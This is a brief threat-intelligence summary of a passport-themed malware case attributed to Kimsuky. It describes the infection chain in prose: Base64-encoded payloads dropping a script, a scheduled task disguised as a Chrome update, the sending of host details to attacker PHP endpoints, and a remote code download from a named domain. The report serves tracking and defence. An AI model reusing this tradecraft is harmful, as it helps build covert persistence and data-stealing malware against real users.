A Korean analysis links a passport-themed malware case to Kimsuky and suggests that Korean passport imagery may have been stolen or otherwise abused as lure material. The sample is identified by MD5, SHA-1, and SHA-256 hashes, with embedded payloads encoded three times in Base64 before dropping chromeupdate.js under %APPDATA%\Microsoft\Windows\Templates. Persistence is created through a scheduled task named "Google Chrome Update" that runs wscript.exe every minute, while PowerShell and WebClient activity sends the victim computer name and OS version to attacker-controlled PHP endpoints. The chain downloads a decoy Template.pdf and executes additional code from nidnaver.cloud infrastructure, making the case relevant for tracking Kimsuky use of personal-document lures and lightweight script-based persistence.